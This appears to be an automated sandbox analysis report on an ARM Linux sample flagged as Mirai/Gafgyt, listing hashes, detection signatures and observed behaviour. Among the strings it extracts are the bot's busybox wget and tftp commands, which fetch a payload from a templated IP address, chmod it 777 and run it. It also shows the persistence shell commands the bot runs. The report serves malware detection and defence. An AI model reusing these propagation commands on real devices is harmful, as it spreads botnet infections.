Linux Analysis Report
Z8xEavXrld

Overview

General Information

Sample Name: Z8xEavXrld
Analysis ID: 679610
MD5: a88fe5d28e2f429c1a9f3f6962d791dc
SHA1: 8ec9d983a5fe3331d828e21a5016e2012ef7a1ba
SHA256: 4c58714e73e90af2e481dca0e772c18d38878934c6c9de747d9de4997b227ad6
Tags: 32 arm elf gafgyt

Detection

Mirai
Score: 60
Range: 0 - 100
Whitelisted: false

Signatures

Yara detected Mirai
Multi AV Scanner detection for submitted file
Sets full permissions to files and/or directories
Sample contains strings that are potentially command strings
Executes the "mkdir" command used to create folders
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Executes the "chmod" command used to modify permissions
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Sample and/or dropped files contains symbols with suspicious names
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

AV Detection

Source: Z8xEavXrld Virustotal: Detection: 40%
Source: Z8xEavXrld ReversingLabs: Detection: 48%
Source: Z8xEavXrld String found in binary or memory: http://%d.%d.%d.%d:%d/snickers/%s
Source: Initial sample Potential command found: GET /snickers/arm HTTP/1.0
Source: Initial sample Potential command found: GET /snickers/arm7 HTTP/1.0
Source: Initial sample Potential command found: GET /snickers/mips HTTP/1.0
Source: Initial sample Potential command found: GET /snickers/mipsel HTTP/1.0
Source: Initial sample Potential command found: GET /snickers/powerpc HTTP/1.0
Source: Initial sample Potential command found: GET /snickers/sh4 HTTP/1.0
Source: Initial sample Potential command found: GET /snickers/m68k HTTP/1.0
Source: Initial sample Potential command found: GET /snickers/sparc HTTP/1.0
Source: Z8xEavXrld ELF static info symbol of initial sample: hide_maps_proc
Source: Z8xEavXrld ELF static info symbol of initial sample: kill_scanners
Source: Z8xEavXrld ELF static info symbol of initial sample: password_size
Source: Z8xEavXrld ELF static info symbol of initial sample: passwords
Source: Z8xEavXrld ELF static info symbol of initial sample: scanner_raw_buf
Source: Initial sample String containing 'busybox' found: /bin/busybox SNICKERS
Source: Initial sample String containing 'busybox' found: /bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox okayuwu && >okayuwu && /bin/busybox chmod 777 okayuwu
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
Source: Initial sample String containing 'busybox' found: >%sokayuwu && cd %s && >retrieve; >okayuwu/bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox okayuwu && >okayuwu && /bin/busybox chmod 777 okayuwu
Source: Initial sample String containing 'busybox' found: >>>/bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
Source: Initial sample String containing 'busybox' found: /bin/busybox DMSNA
Source: Initial sample String containing 'busybox' found: /bin/busybox mkdir %s; >%s.file && cd %s
Source: Initial sample String containing 'busybox' found: /bin/busybox rm -rf .file %s %s
Source: Initial sample String containing 'busybox' found: /bin/busybox cp /bin/busybox %s; /bin/busybox cp /bin/busybox %s; >%s; >%s; /bin/busybox chmod 777 %s %s
Source: Initial sample String containing 'busybox' found: /bin/busybox cp /bin/busybox %s; >%s; /bin/busybox chmod 777 %s
Source: Initial sample String containing 'busybox' found: /bin/busybox wget http://%d.%d.%d.%d:%d/snickers/%s -O -> %s; /bin/busybox chmod 777 %s; ./%s telnet.%s.wget; >%s
Source: Initial sample String containing 'busybox' found: /bin/busybox tftp -r %s -l %s -g %d.%d.%d.%d; /bin/busybox chmod 777 %s; ./%s telnet.%s.tftp; >%s
Source: Initial sample String containing 'busybox' found: /bin/busybox echo '%s\c' %s %s && /bin/busybox echo '\x45\x43\x48\x4f\x44\x4f\x4e\x45\c'
Source: Initial sample String containing 'busybox' found: mipsmipselpowerpcsh4m68ksparc/bin/busybox cp /bin/busybox %s; >%s; /bin/busybox chmod 777 %s
Source: classification engine Classification label: mal60.troj.lin@0/0@0/0
Source: Z8xEavXrld ELF static info symbol of initial sample: /home/firmware/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm
Source: Z8xEavXrld ELF static info symbol of initial sample: libc/string/arm/_memcpy.S
Source: Z8xEavXrld ELF static info symbol of initial sample: libc/string/arm/memcpy.S
Source: Z8xEavXrld ELF static info symbol of initial sample: libc/string/arm/memmove.S
Source: Z8xEavXrld ELF static info symbol of initial sample: libc/string/arm/memset.S
Source: Z8xEavXrld ELF static info symbol of initial sample: libc/string/arm/strlen.S
Source: Z8xEavXrld ELF static info symbol of initial sample: libc/sysdeps/linux/arm/crt1.S
Source: Z8xEavXrld ELF static info symbol of initial sample: libc/sysdeps/linux/arm/crti.S
Source: Z8xEavXrld ELF static info symbol of initial sample: libc/sysdeps/linux/arm/crtn.S
Source: Z8xEavXrld ELF static info symbol of initial sample: libc/sysdeps/linux/arm/sigrestorer.S
Source: Z8xEavXrld ELF static info symbol of initial sample: libc/sysdeps/linux/arm/vfork.S

Persistence and Installation Behavior

Source: /bin/sh (PID: 6245) Chmod executable with 777: /usr/bin/chmod -> chmod 777 /rx05a34hf0/rx05a34hf0
Source: /bin/sh (PID: 6241) Mkdir executable: /usr/bin/mkdir -> mkdir /rx05a34hf0/
Source: /usr/bin/chmod (PID: 6245) File: /rx05a34hf0/rx05a34hf0 (bits: - usr: rwx grp: rwx all: rwx)
Source: /bin/sh (PID: 6245) Chmod executable: /usr/bin/chmod -> chmod 777 /rx05a34hf0/rx05a34hf0
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1582/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1582/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/2033/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/2033/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1612/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1612/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1579/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1579/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1699/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1699/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1335/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1335/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1698/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1698/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/2028/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/2028/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1334/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1334/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1576/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1576/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/2025/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/2025/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/910/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/910/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/912/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/912/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/517/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/517/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/759/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/759/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/918/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/918/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1594/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1594/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1349/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1349/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1623/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1623/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/761/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/761/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1622/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1622/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/884/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/884/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1983/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1983/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/2038/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/2038/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1344/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1344/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1465/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1465/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1586/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1586/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1860/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1860/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1463/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1463/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/800/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/800/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/801/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/801/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1629/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1629/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1627/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1627/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1900/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1900/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/491/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/491/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/2050/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/2050/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1877/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1877/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/772/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/772/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1633/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1633/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1599/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1599/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1632/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1632/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/774/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/774/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1477/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1477/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/654/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/654/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/896/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/896/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1476/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1476/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1872/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1872/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/2048/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/2048/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/655/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/655/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1475/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/1475/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/656/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/656/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/777/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/777/exe
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/657/maps
Source: /tmp/Z8xEavXrld (PID: 6246) File opened: /proc/657/exe
Source: /tmp/Z8xEavXrld (PID: 6238) Shell command executed: sh -c "mkdir /rx05a34hf0/ && >/rx05a34hf0/rx05a34hf0 && cd /rx05a34hf0/ >/dev/null"
Source: /tmp/Z8xEavXrld (PID: 6242) Shell command executed: sh -c "mv /tmp/Z8xEavXrld /rx05a34hf0/rx05a34hf0 && chmod 777 /rx05a34hf0/rx05a34hf0 >/dev/null"
Source: /tmp/Z8xEavXrld (PID: 6231) Queries kernel information via 'uname'
Source: Z8xEavXrld, 6231.1.00007ffe5ab11000.00007ffe5ab32000.rw-.sdmp, Z8xEavXrld, 6233.1.00007ffe5ab11000.00007ffe5ab32000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/Z8xEavXrldSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/Z8xEavXrld
Source: Z8xEavXrld, 6231.1.00005644727ab000.00005644728d9000.rw-.sdmp, Z8xEavXrld, 6233.1.00005644727ab000.00005644728d9000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/arm
Source: Z8xEavXrld, 6231.1.00007ffe5ab11000.00007ffe5ab32000.rw-.sdmp, Z8xEavXrld, 6233.1.00007ffe5ab11000.00007ffe5ab32000.rw-.sdmp Binary or memory string: /usr/bin/qemu-arm
Source: Z8xEavXrld, 6231.1.00005644727ab000.00005644728d9000.rw-.sdmp, Z8xEavXrld, 6233.1.00005644727ab000.00005644728d9000.rw-.sdmp Binary or memory string: #|rDVP%|rDVP"|rDV!/etc/qemu-binfmt/arm

Stealing of Sensitive Information

Source: Yara match File source: Z8xEavXrld, type: SAMPLE
Source: Yara match File source: 6233.1.00007fe4e8017000.00007fe4e8033000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6231.1.00007fe4e8017000.00007fe4e8033000.r-x.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: Z8xEavXrld, type: SAMPLE
Source: Yara match File source: 6233.1.00007fe4e8017000.00007fe4e8033000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6231.1.00007fe4e8017000.00007fe4e8033000.r-x.sdmp, type: MEMORY
No contacted IP infos